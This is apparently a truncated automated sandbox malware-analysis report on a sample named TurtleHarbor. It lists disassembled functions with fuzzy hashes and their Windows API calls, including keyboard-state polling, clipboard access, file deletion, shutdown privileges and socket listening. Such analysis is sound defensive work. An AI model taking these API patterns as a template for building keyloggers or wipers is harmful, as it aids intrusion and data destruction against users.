Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 86766c89b2d18ebcf12244d722185efeec65c36472bedd4878ba80a4909d7977
Instruction ID: f8c5d816f16feb9bde0189f3b73ab4b075fff54166e07efa7d2928e09d970c8e
Opcode Fuzzy Hash: 86766c89b2d18ebcf12244d722185efeec65c36472bedd4878ba80a4909d7977
Instruction Fuzzy Hash: EAE16D71604210AFCB1ADF28C991E6BBBE8EF89714F05896DF849DB261DB30ED41CB51

Function 00370508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00370530
GetAsyncKeyState.USER32(000000A0), ref: 003705B1
GetKeyState.USER32(000000A0), ref: 003705CC
GetAsyncKeyState.USER32(000000A1), ref: 003705E6
GetKeyState.USER32(000000A1), ref: 003705FB
GetAsyncKeyState.USER32(00000011), ref: 00370613
GetKeyState.USER32(00000011), ref: 00370625
GetAsyncKeyState.USER32(00000012), ref: 0037063D
GetKeyState.USER32(00000012), ref: 0037064F
GetAsyncKeyState.USER32(0000005B), ref: 00370667
GetKeyState.USER32(0000005B), ref: 00370679

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a3c333dd2409c3c71a2458174b4dbd713940debcd0405ae039e4a9a3fb674185
Instruction ID: c30159c91a943c2a93dd66aeaf67a839393173692a1f4260a70ad7e4bd804a38
Opcode Fuzzy Hash: a3c333dd2409c3c71a2458174b4dbd713940debcd0405ae039e4a9a3fb674185
Instruction Fuzzy Hash: 2441D8709087C9ADFF3B976488143B5BEA0AB53314F09C05DD5C9466C1EBAC99D4CF92

Function 0037443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00374451
__swprintf.LIBCMT ref: 0037445E

Part of subcall function 003338C8: __woutput_l.LIBCMT ref: 00333921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00374488
LoadResource.KERNEL32(?,00000000), ref: 00374494
LockResource.KERNEL32(00000000), ref: 003744A1
FindResourceW.KERNEL32(?,?,00000003), ref: 003744C1
LoadResource.KERNEL32(?,00000000), ref: 003744D3
SizeofResource.KERNEL32(?,00000000), ref: 003744E2
LockResource.KERNEL32(?), ref: 003744EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,?,?,00000000), ref: 0037454F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: a86bb46b0eafabf47c980cc9298c145b9e7083ca602a3291831fb0fe60c72557
Instruction ID: 3d019757c8036b143d8abea8f50f0793f014233b1eff43c37524dbc5b5a4baf2
Opcode Fuzzy Hash: a86bb46b0eafabf47c980cc9298c145b9e7083ca602a3291831fb0fe60c72557
Instruction Fuzzy Hash: DD31A37150121AABDB279F61ED48EBB7BADFF0A301F008815F915D6150E734E920DB60

Function 00384830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00384857
EmptyClipboard.USER32 ref: 0038485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00384872
CloseClipboard.USER32 ref: 00384911

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 80665f00d3bd62e379fea7d514aaf84d584c71922e4733eabfe817b7572b217a
Instruction ID: 807d0750316b36f16f160838c2608afe87951024f0d95d22c5aa766dd4a16701
Opcode Fuzzy Hash: 80665f00d3bd62e379fea7d514aaf84d584c71922e4733eabfe817b7572b217a
Instruction Fuzzy Hash: C421B2312013119FDB17AF20EC49B6E7BACEF49725F01805AF9069B2B1DB34AD40CB94

Function 00373CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00330284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00322A58,?,00008000), ref: 003302A4

Part of subcall function 00374FEC: GetFileAttributesW.KERNEL32(?,00373BFE), ref: 00374FED

FindFirstFileW.KERNEL32(?,?), ref: 00373D96
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00373E3E
MoveFileW.KERNEL32(?,?), ref: 00373E51
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00373E6E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00373E90
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00373EAC

Strings

\*.*, xrefs: 00373D41, 00373D4A, 00373D5F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 67d6e8bcc87dbf5facd0f563fb813d6c0a67506ed8e7a6b8356b920277bab726
Instruction ID: 8cc26db106888fec619f6d81512d63e55063b1f108f1c2464a45e30657ec1202
Opcode Fuzzy Hash: 67d6e8bcc87dbf5facd0f563fb813d6c0a67506ed8e7a6b8356b920277bab726
Instruction Fuzzy Hash: B851863180116D9ACF27EBA0DA92DEDB779AF21301F204165F446BB191EF356F09DBA0

Function 0037FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0037FA83
FindClose.KERNEL32(00000000), ref: 0037FB96

Part of subcall function 003152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003152E6

Sleep.KERNEL32(0000000A), ref: 0037FAB3
_wcscmp.LIBCMT ref: 0037FAC7
_wcscmp.LIBCMT ref: 0037FAE2
FindNextFileW.KERNEL32(?,?), ref: 0037FB80

Strings

*.*, xrefs: 0037FA68

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 1bf25af5da6f95d95345d57bc566644ccc6c9e5605c9473dc4cfe30ceb107796
Instruction ID: 75fe18c6aac76636c654682b3e85718836bba5820426ce03efee6e8e593e17b4
Opcode Fuzzy Hash: 1bf25af5da6f95d95345d57bc566644ccc6c9e5605c9473dc4cfe30ceb107796
Instruction Fuzzy Hash: 8541947194021ADFCF26DF64CC55AEEBBB8FF15310F148466E818A6291E7349E44CF90

Function 00374005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00330284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00322A58,?,00008000), ref: 003302A4

Part of subcall function 00374FEC: GetFileAttributesW.KERNEL32(?,00373BFE), ref: 00374FED

FindFirstFileW.KERNEL32(?,?), ref: 0037407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 003740CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 003740DD
FindClose.KERNEL32(00000000), ref: 003740F4
FindClose.KERNEL32(00000000), ref: 003740FD

Strings

\*.*, xrefs: 0037404E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 6841a4386369a3dc0303d0a4b65940cb4596840ef83e22ff4c4529f78f83ceed
Instruction ID: a500d2471b88a9845d8f4894e0d648d98c56c32af31d50164b8462321ee6d15b
Opcode Fuzzy Hash: 6841a4386369a3dc0303d0a4b65940cb4596840ef83e22ff4c4529f78f83ceed
Instruction Fuzzy Hash: 363181310083959BC316EF60D9959AFB7ACBEA2304F444E1DF4E586191DB24EA09C7A2

Function 00375778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00369399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003693E3
Part of subcall function 00369399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00369410
Part of subcall function 00369399: GetLastError.KERNEL32 ref: 0036941D

ExitWindowsEx.USER32(?,00000000), ref: 003757B4

Strings

@, xrefs: 003757A7
, xrefs: 003757A2
SeShutdownPrivilege, xrefs: 00375784

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 224c0ba635f7e89476039ee5f788cecfa7e7a977b7cce70d8012042562d98e42
Instruction ID: 1af75b85b31f74891703a06af947ced90bf6a1f73d4b47e01aa07677f2be94f6
Opcode Fuzzy Hash: 224c0ba635f7e89476039ee5f788cecfa7e7a977b7cce70d8012042562d98e42
Instruction Fuzzy Hash: 1E01F731790752EAE77F62649CCBBBB735CAB05740F258529F81BE60D2E9985C008160

Function 0038696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003869C7
WSAGetLastError.WSOCK32(00000000), ref: 003869D6
bind.WSOCK32(00000000,?,00000010), ref: 003869F2
listen.WSOCK32(00000000,00000005), ref: 00386A01
WSAGetLastError.WSOCK32(00000000), ref: 00386A1B
closesocket.WSOCK32(00000000,00000000), ref: 00386A2F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: ae5d25abbc21cf9e97ccefd8ba60148b14efe83d007a1ec93ed3b7efbe54898a
Instruction ID: 983b95035f119550a58ab57eb727746d997f935970eb7e56919de1b775630d51
Opcode Fuzzy Hash: ae5d25abbc21cf9e97ccefd8ba60148b14efe83d007a1ec93ed3b7efbe54898a
Instruction Fuzzy Hash: B321E4702006009FCB0AFF64DD4AA6EB7ADEF49720F118199F816AB3D1CB74AC41CB90

Function 00311663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 003129E2: GetWindowLongW.USER32(?,000000EB), ref: 003129F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00311DD6
GetSysColor.USER32(0000000F), ref: 00311E2A
SetBkColor.GDI32(?,00000000), ref: 00311E3D

Part of subcall function 0031166C: DefDlgProcW.USER32(?,00000020,?), ref: 003116B4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 17d19592740107226085a8d75b72a442dd3989f8826e842601be724d8cdecf66
Instruction ID: 7215e6bd8e90784e9423c6d7ce97aca5642437150d3de20926b5e847c145a0a7
Opcode Fuzzy Hash: 17d19592740107226085a8d75b72a442dd3989f8826e842601be724d8cdecf66
Instruction Fuzzy Hash: 3CA17A7011A404BADA3F6B69AC89EFF359DDF4A301F12010AF602CE5D1EB20EC91D275

Function 0037C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0037C329
_wcscmp.LIBCMT ref: 0037C359
_wcscmp.LIBCMT ref: 0037C36E
FindNextFileW.KERNEL32(00000000,?), ref: 0037C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0037C3AF

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 1dacbb8efc809c00b3929d374bbe64b1b7bafd61e9d8b33c2b0cba155fb7b115
Instruction ID: 5747528db7e4997279e7cd0c6bf7e9f6854568c0c871531463c5714de2865702
Opcode Fuzzy Hash: 1dacbb8efc809c00b3929d374bbe64b1b7bafd61e9d8b33c2b0cba155fb7b115
Instruction Fuzzy Hash: CF51AD756046028FD72ADF68D490EAAB3E8FF49310F01861DF95A8B3A1DB34ED04CB91

Function 00386E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00388475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003884A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00386E89
WSAGetLastError.WSOCK32(00000000), ref: 00386EB2
bind.WSOCK32(00000000,?,00000010), ref: 00386EEB
WSAGetLastError.WSOCK32(00000000), ref: 00386EF8
closesocket.WSOCK32(00000000,00000000), ref: 00386F0C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: f0871c95e3c34a0352bfd4034b7b36193cde21a95b7b0cc13b4264bb83ce4220
Instruction ID: 4ed0a958702dc1af8d1e21147da4ec17edaa96cf69de81c3f38bcdd877b459ea
Opcode Fuzzy Hash: f0871c95e3c34a0352bfd4034b7b36193cde21a95b7b0cc13b4264bb83ce4220
Instruction Fuzzy Hash: B541D3B5600200AFDB16BF64DC86FAE73A89B4D714F048458F915AF3C2DA749D418BA1

Function 003959B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00395A02
IsWindowEnabled.USER32 ref: 00395A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00395A1D
IsIconic.USER32 ref: 00395A2B
IsZoomed.USER32 ref: 00395A39

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 333e452a67df656a0753395c17da5c5c858f8ecf578f61ea4c7eabd2c7ed78a0
Instruction ID: 9a2b80d8b71102f84136f3659f7a909f97775e967f5563962df40be08f1d1fa3
Opcode Fuzzy Hash: 333e452a67df656a0753395c17da5c5c858f8ecf578f61ea4c7eabd2c7ed78a0
Instruction Fuzzy Hash: 3211E7727009119FEB275F669C84A6E7B9DFF46721F014129F805D7241CB30ED818BE4

Function 00350030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00350034
__swprintf.LIBCMT ref: 00350065

Strings

%.3d, xrefs: 0035003F
WIN_XPe, xrefs: 003500A4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: e53c05f20bccc0c0ad420bed85376ab81a0e35ecec242674cdf19c30d2a1d60e
Instruction ID: 4755004e972c68ee3556831f55ceca1819040dc1e1eeda2c7a8591ee4adb60b8
Opcode Fuzzy Hash: e53c05f20bccc0c0ad420bed85376ab81a0e35ecec242674cdf19c30d2a1d60e
Instruction Fuzzy Hash: DCD012B1848108EAC71F9A90C985EF9B37CAB08302F144452FD46E3490D336978CAB22

Function 003829BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00382AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00382AE4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: ef2cafff509081ce3dd378ab8b232d94ad4c95eb21bdcc782062543ae43dca49
Instruction ID: 3c8d618a843bd3c4390c1eff6a2543c58240565d4fa7d78e5b72fa93e10b5446
Opcode Fuzzy Hash: ef2cafff509081ce3dd378ab8b232d94ad4c95eb21bdcc782062543ae43dca49
Instruction Fuzzy Hash: 0641C371604309FFEB26EE94CC85EBBB7ACEF40754F10409AF605A6181EA75AE419760

Function 00369399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003693E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00369410
GetLastError.KERNEL32 ref: 0036941D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 0d1be54a4ca2e1bf740c24488a0ed04d84506aa7f9a15e3d705d3d417bba59f0
Instruction ID: 1aa4fb293ebbbb3cedbf7b60b27c931b7d48edb7b42ee99e207887bcca850000
Opcode Fuzzy Hash: 0d1be54a4ca2e1bf740c24488a0ed04d84506aa7f9a15e3d705d3d417bba59f0
Instruction Fuzzy Hash: 67118FB1418205AFD729DF64DCC5E2BB7BCFB44710B21852EE45996250EB70AC41CB60

Function 00374254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00374271
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003742B2
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003742BD

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 88b60c5915b6d5d0c6fee885b84ac0080009b77f3f28af36d26f71daf0d29737
Instruction ID: 4886a4acd3fcca8be9ed62cebc1bbd5b79d5859aa71cef1a528e065491327687
Opcode Fuzzy Hash: 88b60c5915b6d5d0c6fee885b84ac0080009b77f3f28af36d26f71daf0d29737
Instruction Fuzzy Hash: A6118275E01228BFDB218F959C44BAFBBBCEB45B20F108555FD04E7280C6745A019BA1

Function 00374F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

